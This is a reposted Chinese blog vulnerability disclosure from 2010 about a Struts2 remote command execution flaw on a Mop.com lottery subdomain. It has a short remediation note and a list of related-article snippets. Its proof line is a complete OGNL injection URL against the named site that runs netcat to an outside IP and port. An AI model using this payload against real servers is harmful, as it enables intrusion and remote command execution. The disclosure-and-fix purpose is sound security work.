猫扑网存在远程命令执行漏洞

最新推荐文章于 2024-04-02 14:50:16 发布
最新推荐文章于 2024-04-02 14:50:16 发布
阅读量72 收藏
点赞数
文章标签: web安全 网络安全 hack 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124137151
版权

漏洞详情

披露状态:

2010-07-16: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-18: 细节向公众公开

简要描述:

猫扑网可以远程命令执行,可能造成网站服务器被入侵.

详细说明:

还是Struts,这个跑的好像是一套现成的系统吧.

漏洞证明:

http://caipiao.sports.mop.com/sp1/act/chartmall.chart.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22/usr/bin/nc%20ip port%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1

修复方案:

使用ParameterInterceptor中的excludeParams白名单参数限制允许使用的字符串,比如"A-z0-9_.'"[]",像\()@需要禁止.

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mop猫扑网分页特效代码
03-20
【标题】"mop猫扑网分页特效代码"涉及到的是网页开发中的一个特定功能,即在网站上实现美观且互动性强的分页效果。猫扑网作为一个知名的网络社区,其分页特效可能是为了提高用户体验,使用户在浏览大量内容时能够更...
猫扑网flash新闻广告效果
08-27
"猫扑网flash新闻广告效果"这个主题涉及到的是利用Flash技术在猫扑网上制作和展示新闻广告的情况,以及这些广告对用户产生的影响。猫扑网是中国的一个知名网络社区,以其幽默、趣味和互动性强的内容闻名。 1. Flash...
任意文件读取/下载漏洞总结
热门推荐
未完成的歌~的博客
04-01 1万+
任意文件读取/下载漏洞(Arbitrary File Read/Download Vulnerability),是指攻击者可以通过某些漏洞,绕过应用程序的限制,直接读取或下载应用程序之外的文件。这种漏洞通常是由于应用程序没有对用户输入进行充分的验证和过滤而导致的。攻击者可以通过构造恶意的请求来利用该漏洞,从而读取或下载他们本来无权访问的文件,如密码、私钥、证书等,会提供攻击者更多可用信息,提高被入侵的风险。
任意文件读取漏洞知识梳理
qq_40909772的博客
11-17 1万+
文章目录1.概述2.开发语言触发点2.1 PHP2.2 Python2.3 Java2.4 Ruby2.5 Node3.中间件/服务器相关触发点3.1 Nginx错误配置3.2 数据库3.3 软链接3.4 FFmpeg3.5 Docker-API4.文件读取的目标目录5.题目复现5.1 afr_15.2 afr_25.3 afr_3 1.概述   文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。主要读取的文件是服务器的各种配置文件、文件形式存储的密钥、服务器信息(包括正在执行的进
WEB漏洞原理】任意文件读取漏洞
过期的秋刀鱼
08-31 1152
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。任意文件读取会造成(敏感)信息泄露;任意文件读取大多数情况是由于其他漏洞引发的,如RCE、目录遍历、文件包含等。任意文件读取与任意文件下载本质上没有区别,信息都是从服务端流向浏览器的。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 2436
该篇记录了Web漏洞-任意文件读取漏洞
任意文件读取及漏洞复现
来日可期的博客
08-31 3295
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
猫扑网络 CRM客户关系管理
01-08
猫扑网络 CRM客户关系管理】是针对企业与客户互动的一种高效工具,旨在优化业务流程,提高客户满意度,实现企业利润最大化。CRM系统的核心在于整合、分析和利用客户数据,以便更好地理解客户需求,提供个性化服务...
java小案例,猫扑网
10-24
在Java编程领域,猫扑网是一个著名的Web应用案例,它为初学者提供了深入了解Web开发的实践平台。这个案例涵盖了多种核心的Java技术和Web开发概念,包括Servlet、JSP、MVC设计模式、数据库连接以及用户交互等。让我们...
猫扑网络进销存综合管理系统
03-19
第二步、用计事本打开根目录下的Web.config文件修改数据库连接,sql数据库存在App_Data下,附加到数据库就可以了,ACCESS版请注意连接路径,请使用根相对路径填写数据库路径。 第三步、登录后台(Default.aspx)开始体验V...
新浪XSS漏洞
swordheart的博客
04-14 120
漏洞详情 披露状态: 2010-07-23: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-23: 细节向公众公开 简要描述: 新浪的一个XSS 详细说明: 攻击者利用应用程序的动态展示数据功能,在html页面里嵌入恶意代码。当用户浏览该页之时,这些嵌入在html中的恶意代码会被执行,用
新浪网存在远程执行漏洞
swordheart的博客
04-11 226
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 2010-08-18: 细节向公众公开 简要描述: 新浪网可以远程执行代码,可能造成网站被入侵。 详细说明: 使用struts2的任意产品线,在默认配置情况下会导致任意java代码能够以webserver的权限执行。 如下url存在代码执行漏洞 http://caipiao.sc.sina.com.cn/cbportal/userinfo/showRegister.action http://caipiao.fj.s
发现新浪一注册漏洞
编程视觉
06-06 598
目前偶尔靠运气能出有验证码的wangy
XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析
weixin_34186128的博客
07-11 558
2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫的攻击。此事件给严重依赖社交网络的网友们敲响了警钟。在此之前,国内多家著名的SNS网站和大型博客网站都曾遭遇过类似的攻击事件,只不过没有形成如此大规模传播。虽然此次XSS蠕虫攻击事 件中,恶意黑客攻击者并没有在恶意脚本中植入挂马代码或其他窃取用户账号密码信息的脚本,但是这至少说明,病毒木...
漏洞复现】Casdoor-任意文件读取
最新发布
2301_80115097的博客
04-02 321
Casdoor系统static存在任意文件读取漏洞漏洞描述】Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。
任意文件读取及删除漏洞
qq_50854662的博客
09-27 2089
任意文件读取漏洞及危害 通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件。 任意文件读取漏洞,是web安全里高危的漏洞,...
glassfish任意文件读取漏洞
剁椒鱼头没剁椒的博客
01-27 1208
GlassFish是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。
腾讯某频道持久型XSS
swordheart的博客
04-18 4557
漏洞详情 披露状态: 2010-07-31: 细节已通知厂商并且等待厂商处理中 2010-07-31: 厂商已经确认,细节仅向厂商公开 2010-08-10: 细节向核心白帽子及相关领域专家公开 2010-08-20: 细节向普通白帽子公开 2010-08-30: 细节向实习白帽子公开 2010-08-30: 细节向公众公开 简要描述: 持久XSS,可得到cookies 详细说明: 存在在腾讯搜吧里,发贴时未过滤严谨 漏洞证明: 如在此吧: http://review.book.qq.com
xss攻击之新浪微博xss蠕虫
zhangzhangdan的博客
07-21 2588
xss蠕虫:通过一个bug,感染其他结构都出现问题 我们根据一段xss攻击链接来看一下: 很显然,javascript代码被解析了,那它原型是什么呢,怎么看  通过这样我们可以看出,这段javascript代码是指向一个js文件,js文件中写的是一些文章标题链接,而这段链接也是携带这段javascript代码,这样当有人点击了这段链接,就又执行这个xss攻击操作了,这样一传十,十传百...
mop网虚拟社区.pptx
02-06
"该资源主要探讨了Mop网虚拟社区,即猫扑网的相关情况,包括其基本概况、商业模式、技术模式、经营模式、管理模式和资本模式,并重点介绍了猫扑大杂烩、猫扑贴贴论坛、猫扑Hi等核心产品及其特点和功能。" Mop网虚拟...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值